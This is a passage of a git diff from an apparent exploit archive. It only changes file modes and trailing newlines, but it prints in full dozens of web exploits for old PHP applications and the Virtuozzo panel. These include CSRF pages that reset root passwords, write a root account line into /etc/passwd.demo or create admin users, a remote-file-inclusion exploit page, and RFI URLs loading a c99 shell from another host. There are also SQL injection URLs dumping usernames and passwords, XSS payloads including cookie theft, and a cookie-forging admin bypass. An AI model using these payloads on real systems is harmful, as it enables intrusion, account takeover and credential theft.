page is fully loaded 5. check /etc/passwd.demo in the target vps filesystemm --> <script language="JavaScript"> var ok=false; function letsgo(){ ok=true; document.getElementById('form0').submit(); } </script> <!-- this sets /etc as the current path--> <iframe style="width:1px;height:1px;visibility:hidden" name=ifr src="https://127.0.0.1:4643/vz/cp/vzdir/infrman/envs/files/index?path=L2V0Yw==" ></iframe> <iframe id=ifr1 style="width:1px;height:1px;visibility:hidden" name=ifr1 onload="if(ok)document.getElementById('form1').submit();" ></iframe> <iframe id=ifr2 style="width:1px;height:1px;visibility:hidden" name=ifr2 > </iframe> <!-- delete /etc/passwd.demo --> <form id=form0 target=ifr1 method=post action="https://127.0.0.1:4643/vz/cp/vzdir/infrman/envs/files/list-control" > <input type=hidden name="file-name" value="passwd.demo"> <input type=hidden name=delete value=1> </form> <!-- create /etc/passwd.demo --> <form id=form1 target=ifr2 enctype="multipart/form-data" name="defaultForm" method="POST" action="https://127.0.0.1:4643/vz/cp/vzdir/infrman/envs/files/create-file"> <input xmlns:http="http://www.swsoft.com/xsl/cp/http" type="hidden" name="step" value="gen"> <input type=hidden name="file_name" value="passwd.demo"> <input type=hidden name="file_body" value="root::0:0::/root:/bin/bash"> <input type=hidden name="next" value="Create"> </form> <input type=button value="lets rock" onclick="letsgo()"> \ No newline at end of file diff --git a/platforms/php/webapps/31604.html b/platforms/php/webapps/31604.html old mode 100755 new mode 100644 index f11966dac..4ba37af4a --- a/platforms/php/webapps/31604.html +++ b/platforms/php/webapps/31604.html @@ -6,4 +6,4 @@ Exploiting the issue will allow a remote attacker to use a victim's currently ac Virtuozzo Containers 3.0.0-25.4.swsoft is vulnerable; other versions are also affected. -<!-- poplix papuasia.org -- http://px.dynalias.org -- 04-02-2008 this file exploits a vulnerable installation of virtuozzo web panel by setting root password to "csrfsafepass" tested against Version 25.4.swsoft (build: 3.0.0-25.4.swsoft) perform the following steps to test it: 1. in this file replace 127.0.0.1 with target vps address 2. open a web browser and log into virtuozzo web interface 3. open this file in a new browser window and click the "change pwd" --> <form target=vrtifr name="defaultForm" method="post" action="https://127.0.0.1:4643/vz/cp/pwd"> <input type="hidden" name="passwd" value="csrfsafepass"> <input type="hidden" name="retype" value="csrfsafepass"> <input type="hidden" name="_submit" value="Change" > </form> <iframe style="width:1px;height:1px;visibility:hidden" name="vrtifr"></iframe> <input type=button value="change pwd" onclick="document.defaultForm.submit()"> \ No newline at end of file +<!-- poplix papuasia.org -- http://px.dynalias.org -- 04-02-2008 this file exploits a vulnerable installation of virtuozzo web panel by setting root password to "csrfsafepass" tested against Version 25.4.swsoft (build: 3.0.0-25.4.swsoft) perform the following steps to test it: 1. in this file replace 127.0.0.1 with target vps address 2. open a web browser and log into virtuozzo web interface 3. open this file in a new browser window and click the "change pwd" --> <form target=vrtifr name="defaultForm" method="post" action="https://127.0.0.1:4643/vz/cp/pwd"> <input type="hidden" name="passwd" value="csrfsafepass"> <input type="hidden" name="retype" value="csrfsafepass"> <input type="hidden" name="_submit" value="Change" > </form> <iframe style="width:1px;height:1px;visibility:hidden" name="vrtifr"></iframe> <input type=button value="change pwd" onclick="document.defaultForm.submit()"> \ No newline at end of file diff --git a/platforms/php/webapps/31605.txt b/platforms/php/webapps/31605.txt old mode 100755 new mode 100644 index c86b2b6c7..89a060321 --- a/platforms/php/webapps/31605.txt +++ b/platforms/php/webapps/31605.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Poplar Gedcom Viewer 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/poplar/index.php?genID=1&page=search&text="><script>alert("CANAKKALE-GECiLMEZ")</script>&ul=&start=0 http://www.example.com/poplar/index.php?genID=1&page=search&text=&ul="><script>alert("CANAKKALE-GECiLMEZ")</script>&start=0 \ No newline at end of file +http://www.example.com/poplar/index.php?genID=1&page=search&text="><script>alert("CANAKKALE-GECiLMEZ")</script>&ul=&start=0 http://www.example.com/poplar/index.php?genID=1&page=search&text=&ul="><script>alert("CANAKKALE-GECiLMEZ")</script>&start=0 \ No newline at end of file diff --git a/platforms/php/webapps/31606.txt b/platforms/php/webapps/31606.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31608.txt b/platforms/php/webapps/31608.txt old mode 100755 new mode 100644 index 2f0063bac..f5d91b699 --- a/platforms/php/webapps/31608.txt +++ b/platforms/php/webapps/31608.txt @@ -4,4 +4,4 @@ KwsPHP is prone to a cross-site scripting vulnerability because it fails to prop An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/Path/index.php?mod=ConcoursPhoto&VIEW=[XSS] \ No newline at end of file +http://www.example.com/Path/index.php?mod=ConcoursPhoto&VIEW=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31609.txt b/platforms/php/webapps/31609.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3161.txt b/platforms/php/webapps/3161.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31610.txt b/platforms/php/webapps/31610.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31611.txt b/platforms/php/webapps/31611.txt old mode 100755 new mode 100644 index e956677b8..ec0c1d754 --- a/platforms/php/webapps/31611.txt +++ b/platforms/php/webapps/31611.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the application and RobotStats 0.1 is vulnerable; other versions may also be affected. -http://www.example.com/RobotStats_path/robotstats.inc.php?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file +http://www.example.com/RobotStats_path/robotstats.inc.php?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31614.txt b/platforms/php/webapps/31614.txt old mode 100755 new mode 100644 index 6fd41b72c..93ddffa3b --- a/platforms/php/webapps/31614.txt +++ b/platforms/php/webapps/31614.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Tiny Portal 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?PHPSESSID=d0de2085c36edc6b8a5db1e7e8538e3b&action=tpmod;sa=shoutbox;shouts=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3 \ No newline at end of file +http://www.example.com/index.php?PHPSESSID=d0de2085c36edc6b8a5db1e7e8538e3b&action=tpmod;sa=shoutbox;shouts=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3 \ No newline at end of file diff --git a/platforms/php/webapps/31616.txt b/platforms/php/webapps/31616.txt old mode 100755 new mode 100644 index 12f051049..d96979b26 --- a/platforms/php/webapps/31616.txt +++ b/platforms/php/webapps/31616.txt @@ -6,4 +6,4 @@ Exploiting this issue can allow an attacker to compromise the application and th Web Server Creator 0.1 is vulnerable; other versions may also be affected. -http://www.example.com/Web_Server_Creator_path/news/include/createdb.php?langfile;=ZoRLu.txt? \ No newline at end of file +http://www.example.com/Web_Server_Creator_path/news/include/createdb.php?langfile;=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/3162.txt b/platforms/php/webapps/3162.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31622.txt b/platforms/php/webapps/31622.txt old mode 100755 new mode 100644 index e1a7b6807..0306f6153 --- a/platforms/php/webapps/31622.txt +++ b/platforms/php/webapps/31622.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br URLStreet 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/URLStreet/seeurl.php?language="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/URLStreet/seeurl.php?language=a&pageno=1&filter=none&order="><script>alert("CANAKKALE-GECiLMEZ")</script>&search=aaa http://www.example.com/URLStreet/seeurl.php?language=a&pageno=1&filter="><script>alert("CANAKKALE-GECiLMEZ")</script>&order=hit&search=aaa \ No newline at end of file +http://www.example.com/URLStreet/seeurl.php?language="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/URLStreet/seeurl.php?language=a&pageno=1&filter=none&order="><script>alert("CANAKKALE-GECiLMEZ")</script>&search=aaa http://www.example.com/URLStreet/seeurl.php?language=a&pageno=1&filter="><script>alert("CANAKKALE-GECiLMEZ")</script>&order=hit&search=aaa \ No newline at end of file diff --git a/platforms/php/webapps/31623.txt b/platforms/php/webapps/31623.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31625.txt b/platforms/php/webapps/31625.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31626.txt b/platforms/php/webapps/31626.txt old mode 100755 new mode 100644 index f2a07100e..364534663 --- a/platforms/php/webapps/31626.txt +++ b/platforms/php/webapps/31626.txt @@ -8,4 +8,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc This issue affects Prozilla Software Index 1.1; other versions may also be vulnerable. -http://www.example.com/showcategory.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(0x3C666F6E7420636F6C6F723D22726564223E,admin_name,0x3a,pwd,0x3C2F666F6E743E),3,4,5/**/FROM/**/sbwmd_admin/* \ No newline at end of file +http://www.example.com/showcategory.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(0x3C666F6E7420636F6C6F723D22726564223E,admin_name,0x3a,pwd,0x3C2F666F6E743E),3,4,5/**/FROM/**/sbwmd_admin/* \ No newline at end of file diff --git a/platforms/php/webapps/31628.txt b/platforms/php/webapps/31628.txt old mode 100755 new mode 100644 index 1d542c756..e39f0e383 --- a/platforms/php/webapps/31628.txt +++ b/platforms/php/webapps/31628.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Swiki 1.5 is vulnerable; other versions may also be affected. -http://www.example.com:8000/<script>alert("XSS");</script> \ No newline at end of file +http://www.example.com:8000/<script>alert("XSS");</script> \ No newline at end of file diff --git a/platforms/php/webapps/3163.txt b/platforms/php/webapps/3163.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31631.txt b/platforms/php/webapps/31631.txt old mode 100755 new mode 100644 index d29781e3d..bf50ebc84 --- a/platforms/php/webapps/31631.txt +++ b/platforms/php/webapps/31631.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc This issue affects PU Arcade 2.2; other versions may also be affected. -http://www.example..com/Path/index.php?option=com_puarcade&Itemid=1&gid=0 UNION SELECTpassword,username,0,0,0 from jos_users-- \ No newline at end of file +http://www.example..com/Path/index.php?option=com_puarcade&Itemid=1&gid=0 UNION SELECTpassword,username,0,0,0 from jos_users-- \ No newline at end of file diff --git a/platforms/php/webapps/31633.html b/platforms/php/webapps/31633.html old mode 100755 new mode 100644 index 63095f39d..dfed51530 --- a/platforms/php/webapps/31633.html +++ b/platforms/php/webapps/31633.html @@ -4,4 +4,4 @@ Fishing Cat Portal Addon for phpBB is prone to a remote file-include vulnerabili Exploiting this issue can allow an attacker to compromise the application and the underlying system; other attacks are also possible. -<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</title> <script language="JavaScript"> //'Bug found and Exploit coded by bd0rk //'Vendor: http://www.foxymods-phpbb.com/ //'Download: http://www.foxymods-phpbb.com/download.php?id=7 //'Contact: bd0rk[at]hackermail.com //'Vulnerable Code in line 21: include_once($phpbb_root_path . 'includes/lite.'.$phpEx); //'$phpbb_root_path is not declared before include //'Greetings: str0ke, TheJT, rgod, Frauenarzt //#The german Hacker bd0rk var dir="/includes/" var file="/functions_portal.php?" var parameter ="phpbb_root_path=" var shell="Insert your shellcode here" function command() { if (document.rfi.target1.value==""){ alert("Exploit failed..."); return false; } rfi.action= document.rfi.target1.value+dir+file+parameter+shell; rfi.submit(); } </script> </head> <body bgcolor="#000000"> <center> <p><b><font face="Verdana" size="2" color="#008000">Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</font></b></p> <p></p> <form method="post" target="getting" name="rfi" onSubmit="command();"> <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial"> </font><font color="#FF0000" size="2">&nbsp;</font></b> <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p> <p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p> </form> <p><br> <iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe> </p> <b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p> </center> </body> </html> \ No newline at end of file +<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</title> <script language="JavaScript"> //'Bug found and Exploit coded by bd0rk //'Vendor: http://www.foxymods-phpbb.com/ //'Download: http://www.foxymods-phpbb.com/download.php?id=7 //'Contact: bd0rk[at]hackermail.com //'Vulnerable Code in line 21: include_once($phpbb_root_path . 'includes/lite.'.$phpEx); //'$phpbb_root_path is not declared before include //'Greetings: str0ke, TheJT, rgod, Frauenarzt //#The german Hacker bd0rk var dir="/includes/" var file="/functions_portal.php?" var parameter ="phpbb_root_path=" var shell="Insert your shellcode here" function command() { if (document.rfi.target1.value==""){ alert("Exploit failed..."); return false; } rfi.action= document.rfi.target1.value+dir+file+parameter+shell; rfi.submit(); } </script> </head> <body bgcolor="#000000"> <center> <p><b><font face="Verdana" size="2" color="#008000">Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</font></b></p> <p></p> <form method="post" target="getting" name="rfi" onSubmit="command();"> <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial"> </font><font color="#FF0000" size="2">&nbsp;</font></b> <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p> <p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p> </form> <p><br> <iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe> </p> <b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p> </center> </body> </html> \ No newline at end of file diff --git a/platforms/php/webapps/31636.txt b/platforms/php/webapps/31636.txt old mode 100755 new mode 100644 index ce63f1504..2dec9d5fa --- a/platforms/php/webapps/31636.txt +++ b/platforms/php/webapps/31636.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc This issue affects unknown versions of phpHotResources; we will update this BID when more details become available. -http://www.example.com/[path]/cat.php?lang=4&kind=-4214+union+select+1,user_name,password,4,5,6,7,8,9+from+users/* \ No newline at end of file +http://www.example.com/[path]/cat.php?lang=4&kind=-4214+union+select+1,user_name,password,4,5,6,7,8,9+from+users/* \ No newline at end of file diff --git a/platforms/php/webapps/31637.txt b/platforms/php/webapps/31637.txt old mode 100755 new mode 100644 index 001bef21b..da3a6018c --- a/platforms/php/webapps/31637.txt +++ b/platforms/php/webapps/31637.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc This issue affects unknown versions of Dating Club; we will update this BID when more details become available. -http://www.example.com/[path]/browse.php?mode=browsebyCat&_gender=0&age_from=15&age_to=-4214/**/union/**/select/**/1,user_name,password,4,5,6,7,8/**/from/**/users/*&country=&state=&field=body \ No newline at end of file +http://www.example.com/[path]/browse.php?mode=browsebyCat&_gender=0&age_from=15&age_to=-4214/**/union/**/select/**/1,user_name,password,4,5,6,7,8/**/from/**/users/*&country=&state=&field=body \ No newline at end of file diff --git a/platforms/php/webapps/31640.txt b/platforms/php/webapps/31640.txt old mode 100755 new mode 100644 index 513e1e215..d9ccffeff --- a/platforms/php/webapps/31640.txt +++ b/platforms/php/webapps/31640.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Poll Booth v2.0 is vulnerable; other versions may also be affected. -http://www.example.com/pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users \ No newline at end of file +http://www.example.com/pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users \ No newline at end of file diff --git a/platforms/php/webapps/3165.txt b/platforms/php/webapps/3165.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31651.txt b/platforms/php/webapps/31651.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31652.txt b/platforms/php/webapps/31652.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31653.txt b/platforms/php/webapps/31653.txt old mode 100755 new mode 100644 index 8dee5e877..d70379b8b --- a/platforms/php/webapps/31653.txt +++ b/platforms/php/webapps/31653.txt @@ -6,4 +6,4 @@ Attackers may leverage these issues to execute arbitrary script code in the brow Amfphp 1.2 is vulnerable; other versions may also be affected. -http://www.example.com/amfphp/browser/details.php?class=[xss] \ No newline at end of file +http://www.example.com/amfphp/browser/details.php?class=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/31654.txt b/platforms/php/webapps/31654.txt old mode 100755 new mode 100644 index 2c6f9b8e8..eca509f26 --- a/platforms/php/webapps/31654.txt +++ b/platforms/php/webapps/31654.txt @@ -4,4 +4,4 @@ W2B Online Banking is prone to a remote file-include vulnerability because it fa Exploiting this issue can allow an attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/[path]/index.php?ilang=http://www.example2.com/c99.txt \ No newline at end of file +http://www.example.com/[path]/index.php?ilang=http://www.example2.com/c99.txt \ No newline at end of file diff --git a/platforms/php/webapps/31655.txt b/platforms/php/webapps/31655.txt old mode 100755 new mode 100644 index fd72b1e33..30d1bee49 --- a/platforms/php/webapps/31655.txt +++ b/platforms/php/webapps/31655.txt @@ -4,4 +4,4 @@ Istant-Replay is prone to a remote file-include vulnerability because it fails t Exploiting this issue can allow an attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/[forum]/read.php?data=http://127.0.0.1/c99.txt? \ No newline at end of file +http://www.example.com/[forum]/read.php?data=http://127.0.0.1/c99.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31658.txt b/platforms/php/webapps/31658.txt old mode 100755 new mode 100644 index 03b10646f..d668807b5 --- a/platforms/php/webapps/31658.txt +++ b/platforms/php/webapps/31658.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow MyBoard 1.0.12 is vulnerable; other versions may also be affected. -http://www.example.com/MyBoard/rep.php?id=[XSS] \ No newline at end of file +http://www.example.com/MyBoard/rep.php?id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31659.txt b/platforms/php/webapps/31659.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31660.txt b/platforms/php/webapps/31660.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31661.txt b/platforms/php/webapps/31661.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31662.txt b/platforms/php/webapps/31662.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31663.txt b/platforms/php/webapps/31663.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31664.txt b/platforms/php/webapps/31664.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31665.txt b/platforms/php/webapps/31665.txt old mode 100755 new mode 100644 index ab7c383f2..6742a33c7 --- a/platforms/php/webapps/31665.txt +++ b/platforms/php/webapps/31665.txt @@ -4,4 +4,4 @@ EsContacts is prone to multiple cross-site scripting vulnerabilities because it Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/EScontacts_path/EsContacts/search.php?msg=[XSS] \ No newline at end of file +http://www.example.com/EScontacts_path/EsContacts/search.php?msg=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31668.txt b/platforms/php/webapps/31668.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31669.txt b/platforms/php/webapps/31669.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31670.txt b/platforms/php/webapps/31670.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31671.html b/platforms/php/webapps/31671.html old mode 100755 new mode 100644 index 7c2f6be49..ae1c8f68f --- a/platforms/php/webapps/31671.html +++ b/platforms/php/webapps/31671.html @@ -6,4 +6,4 @@ Exploiting these issues may allow a remote attacker to create administrative acc TorrentFlux 2.3 is vulnerable; other versions may also be affected. -<html> Add an admistrative account: <form id=?create_admin? method=?post? action=?http://localhost/torrentflux_2.3/html/admin.php?op=addUser?> <input type=hidden name=?newUser? value=?sadmin?> <input type=hidden name=?pass1&#8243; value=?password?> <input type=hidden name=?pass2&#8243; value=?password?> <input type=hidden name=?userType? value=1> <input type=submit value=?create admin?> </form> </html> <script> document.getElementById(?create_admin?).submit(); </script> \ No newline at end of file +<html> Add an admistrative account: <form id=?create_admin? method=?post? action=?http://localhost/torrentflux_2.3/html/admin.php?op=addUser?> <input type=hidden name=?newUser? value=?sadmin?> <input type=hidden name=?pass1&#8243; value=?password?> <input type=hidden name=?pass2&#8243; value=?password?> <input type=hidden name=?userType? value=1> <input type=submit value=?create admin?> </form> </html> <script> document.getElementById(?create_admin?).submit(); </script> \ No newline at end of file diff --git a/platforms/php/webapps/31672.txt b/platforms/php/webapps/31672.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31674.txt b/platforms/php/webapps/31674.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31676.txt b/platforms/php/webapps/31676.txt old mode 100755 new mode 100644 index 050a66000..3ae7a0476 --- a/platforms/php/webapps/31676.txt +++ b/platforms/php/webapps/31676.txt @@ -4,4 +4,4 @@ Host Directory PRO is prone to a security-bypass vulnerability because it fails Exploiting this issue may allow an attacker to bypass certain security restrictions and gain administrative access to the application. This will compromise the application and may aid in further attacks. -javascript:document.cookie = "adm=1 path=/;"; \ No newline at end of file +javascript:document.cookie = "adm=1 path=/;"; \ No newline at end of file diff --git a/platforms/php/webapps/31677.txt b/platforms/php/webapps/31677.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31678.txt b/platforms/php/webapps/31678.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31679.txt b/platforms/php/webapps/31679.txt old mode 100755 new mode 100644 index 9ff68b275..9b9e935ec --- a/platforms/php/webapps/31679.txt +++ b/platforms/php/webapps/31679.txt @@ -7,4 +7,4 @@ An attacker can exploit this issue to include arbitrary remote files containing PortailPHP 2.0 is vulnerable; other versions may also be vulnerable. -http://www.example.com/portailphp_path/mod_search/index.php?chemin=ZoRlu.txt \ No newline at end of file +http://www.example.com/portailphp_path/mod_search/index.php?chemin=ZoRlu.txt \ No newline at end of file diff --git a/platforms/php/webapps/31682.txt b/platforms/php/webapps/31682.txt old mode 100755 new mode 100644 index 38a81fe7c..58dcb1a70 --- a/platforms/php/webapps/31682.txt +++ b/platforms/php/webapps/31682.txt @@ -8,4 +8,4 @@ S9Y Serendipity 1.3 is vulnerable; other versions may also be affected. The following proof of concept is available for the referrer issue: -wget --referer='http://<hr onMouseOver="alert(7)">' http://someblog.com/ \ No newline at end of file +wget --referer='http://<hr onMouseOver="alert(7)">' http://someblog.com/ \ No newline at end of file diff --git a/platforms/php/webapps/3169.txt b/platforms/php/webapps/3169.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31697.txt b/platforms/php/webapps/31697.txt old mode 100755 new mode 100644 index 145f80b7d..6c3468869 --- a/platforms/php/webapps/31697.txt +++ b/platforms/php/webapps/31697.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML and script code would execute in the context of the affec This issue affects Kronolith 2.1.7. The vulnerable Kronolith versions are included in Horde Groupware 1.0.5 and Horde Groupware Webmail Edition 1.0.6. -http://www.example.com/horde/kronolith/addevent.php?timestamp=1208932200&url=[xss] \ No newline at end of file +http://www.example.com/horde/kronolith/addevent.php?timestamp=1208932200&url=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/31700.txt b/platforms/php/webapps/31700.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31701.txt b/platforms/php/webapps/31701.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31702.txt b/platforms/php/webapps/31702.txt old mode 100755 new mode 100644 index b1cc5cc89..4c4aa00bb --- a/platforms/php/webapps/31702.txt +++ b/platforms/php/webapps/31702.txt @@ -6,4 +6,4 @@ An attacker can leverage this issue to execute arbitrary code on an affected com Note that to exploit this issue, the attacker may require valid login credentials. -http://www.example.com/phpnuke/upload_category/filename.html \ No newline at end of file +http://www.example.com/phpnuke/upload_category/filename.html \ No newline at end of file diff --git a/platforms/php/webapps/31703.txt b/platforms/php/webapps/31703.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31704.txt b/platforms/php/webapps/31704.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31705.txt b/platforms/php/webapps/31705.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31708.txt b/platforms/php/webapps/31708.txt old mode 100755 new mode 100644 index 0496cac00..df4365c65 --- a/platforms/php/webapps/31708.txt +++ b/platforms/php/webapps/31708.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th Visites 1.1 RC2 is vulnerable; other versions may also be affected. -http://www.example.com/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode] \ No newline at end of file +http://www.example.com/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode] \ No newline at end of file diff --git a/platforms/php/webapps/31709.txt b/platforms/php/webapps/31709.txt old mode 100755 new mode 100644 index 1c12bb225..db4f584b4 --- a/platforms/php/webapps/31709.txt +++ b/platforms/php/webapps/31709.txt @@ -8,4 +8,4 @@ Or, the attacker may exploit the issue as a local file-include vulnerability to Siteman 2.0.x2 is vulnerable; other versions may also be affected. -http://www.example.com/siteman2/index.php?module=[XSS] \ No newline at end of file +http://www.example.com/siteman2/index.php?module=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31714.txt b/platforms/php/webapps/31714.txt old mode 100755 new mode 100644 index 8869a219b..2ef6f1998 --- a/platforms/php/webapps/31714.txt +++ b/platforms/php/webapps/31714.txt @@ -4,4 +4,4 @@ C-News is prone to a cross-site scripting vulnerability because it fails to prop An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/install.php?etape=[XSS] \ No newline at end of file +http://www.example.com/install.php?etape=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31716.txt b/platforms/php/webapps/31716.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31717.txt b/platforms/php/webapps/31717.txt old mode 100755 new mode 100644 index 79ca114e4..af973816d --- a/platforms/php/webapps/31717.txt +++ b/platforms/php/webapps/31717.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow MJGUEST 6.7 GT is vulnerable; other versions may also be affected. -http://www.example.com/mjguest/mjguest.php?do=redirect&level=>"<[XSS] \ No newline at end of file +http://www.example.com/mjguest/mjguest.php?do=redirect&level=>"<[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/3172.php b/platforms/php/webapps/3172.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31720.txt b/platforms/php/webapps/31720.txt old mode 100755 new mode 100644 index d6276f4b9..7be527f99 --- a/platforms/php/webapps/31720.txt +++ b/platforms/php/webapps/31720.txt @@ -14,4 +14,4 @@ http://www.example.com/quicktalk/qtf_ind_search_ov.php?a=user&id=[XSS] http://www.example.com/quicktalk/qtf_ind_search_kw.php?title=adasdasdadasda&f=-1&al=0&at=0&s=[XSS] http://www.example.com/quicktalk/qtf_ind_stat.php?y=[XSS] http://www.example.com/quicktalk/qtf_ind_post.php?f=1&t=1[XSS] -http://www.example.com/quicktalk/qtf_adm_cmd.php?a=[XSS] \ No newline at end of file +http://www.example.com/quicktalk/qtf_adm_cmd.php?a=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31721.txt b/platforms/php/webapps/31721.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31722.txt b/platforms/php/webapps/31722.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31723.txt b/platforms/php/webapps/31723.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31724.txt b/platforms/php/webapps/31724.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31725.txt b/platforms/php/webapps/31725.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31726.txt b/platforms/php/webapps/31726.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31727.txt b/platforms/php/webapps/31727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31730.txt b/platforms/php/webapps/31730.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31731.txt b/platforms/php/webapps/31731.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31732.txt b/platforms/php/webapps/31732.txt old mode 100755 new mode 100644 index 254102dff..e3fb9f231 --- a/platforms/php/webapps/31732.txt +++ b/platforms/php/webapps/31732.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br http://www.example.com/GEDCOM_to_MySQL2/php/info.php?nom_branche=[XSS] http://www.example.com/GEDCOM_to_MySQL2/php/info.php?nom=[XSS] -http://www.example.com/GEDCOM_to_MySQL2/php/info.php?prenom=[XSS] \ No newline at end of file +http://www.example.com/GEDCOM_to_MySQL2/php/info.php?prenom=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31734.txt b/platforms/php/webapps/31734.txt old mode 100755 new mode 100644 index 386657356..e2ce864ec --- 